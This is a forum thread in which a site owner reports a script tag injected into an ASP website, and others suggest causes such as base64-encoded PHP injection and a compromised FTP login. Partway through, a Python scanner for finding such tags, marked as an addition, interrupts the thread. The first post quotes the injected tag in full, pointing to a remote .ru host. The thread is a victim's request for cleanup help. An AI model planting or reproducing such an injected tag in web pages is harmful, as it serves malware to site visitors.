Malware

Somewhere in my code is a malware script

It's basically this
remote data services data control bloodhound virus embedded in webpage : services, remote, control

I've searched high and low for the script within the code without any luck. Using Firefox with combined generated source you can see it - index page shows the code at the bottom

<script src="h**p://surfthechannel-com.tribalfusion.com.rakuten-co-jp.worldwebworld.ru:8080/google.com/google.com/yieldmanager.com/girlsgogames.com/it168.com/" id="Y1oh3ud7md" type="text/javascript" defer="defer"></script>

but looking at the 2 frames individually it isn't there

I've run malware and antivirus scans all over it without joy. Also full script searches for any of the text within that link - even gone through all the JavaScript references

any ideas??
 
Not just from that I'm afraid, the ones I've seen have usually been included by using PHPs base64_decode function, making it harder to spot/find.
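Why a text search for the URL can come up empty when the tag is stored base64-encoded, as the reply above describes, shown as an added example that is not part of the original thread. The host `injected.example.invalid`, the allowlist and the sample strings are constructed placeholders, and the helper names are hypothetical.

```python
import base64
import os
import re
import sys
from urllib.parse import urlparse

# Hosts the site is expected to load scripts from (assumed; adjust per site).
ALLOWED_HOSTS = {"www.example.test"}
SCRIPT_SRC = re.compile(r'<script[^>]+src\s*=\s*["\']([^"\']+)["\']', re.I)
B64_RUN = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')

# Constructed sample inputs (not taken from the site in the thread).
INJECTED = '<script src="http://injected.example.invalid:8080/a/" defer="defer"></script>'
SAMPLE_CLEAN = '<html><script src="js/menu.js"></script></html>'
SAMPLE_PLAIN = SAMPLE_CLEAN + INJECTED
SAMPLE_ENCODED = '<?php echo base64_decode("%s"); ?>' % base64.b64encode(INJECTED.encode()).decode()

def external_scripts(text):
    """Return script src URLs whose host is not in ALLOWED_HOSTS."""
    hits = []
    for src in SCRIPT_SRC.findall(text):
        host = urlparse(src).hostname  # None for relative paths such as js/menu.js
        if host and host not in ALLOWED_HOSTS:
            hits.append(src)
    return hits

def scan(text):
    """Check a file's text as written, then again after decoding base64 runs."""
    findings = [("plain", s) for s in external_scripts(text)]
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4))
        except ValueError:  # not valid base64 after all
            continue
        findings += [("base64", s) for s in external_scripts(raw.decode("utf-8", "ignore"))]
    return findings

if __name__ == "__main__":
    # Usage: python scan.py /path/to/site/copy
    for root, _dirs, names in os.walk(sys.argv[1]):
        for name in names:
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                for kind, src in scan(fh.read()):
                    print(f"{path}: [{kind}] {src}")
```

Run against both the live copy and the archived copy from before the change; files that differ between the two are the ones worth reading by hand.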
 
ASP site so not sure it will be in the PHP?
Have been using Firebug to step through every parameter but not sure what exactly I'm looking for

well if you can spot it
URL is ******marineband.com
any help appreciated
 
Bit odd that antivirus and malware scans missed these.
I know that they can't cover every script but the format must be similar. I've had this before.
Oddly they are very recent additions - I archived the site last week and they were not in there then. Suppose hackers work every day :)
 
Are you going to make any changes to ensure that this doesn't happen again? Is everything up-to-date? It's possible that they're using some kind of automated software to exploit a weakness.
 
Difficult to spot unless I know exactly how they got in.
FTP access to files - means I can only change the password on the FTP, which will only delay them if they are that keen. Not sure what it was set to but I can only imagine that's the way they did it?
 